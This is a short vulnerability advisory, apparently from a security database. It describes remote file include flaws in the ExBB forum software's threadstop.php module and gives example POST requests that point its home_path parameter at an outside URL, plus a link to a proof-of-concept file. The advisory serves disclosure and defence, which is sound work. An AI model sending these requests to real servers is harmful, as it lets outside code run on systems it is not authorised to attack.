ExBB Home_Path Parameter Multiple Remote File Include Vulnerabilities

info
discussion
exploit
solution
references

ExBB Home_Path Parameter Multiple Remote File Include Vulnerabilities

Attackers can exploit these issues via a browser.

The following POST examples are available:

POST www.example.com/Ex/modules/threadstop/threadstop.php? new_exbb[home_path]=http://www.example2.com?
POST www.example.com/Ex/modules/threadstop/threadstop.php? exbb[home_path]=http://www.example2.com/page?

The following proof-of-concept URIs are available:

/data/vulnerabilities/exploits/19787-rfi.html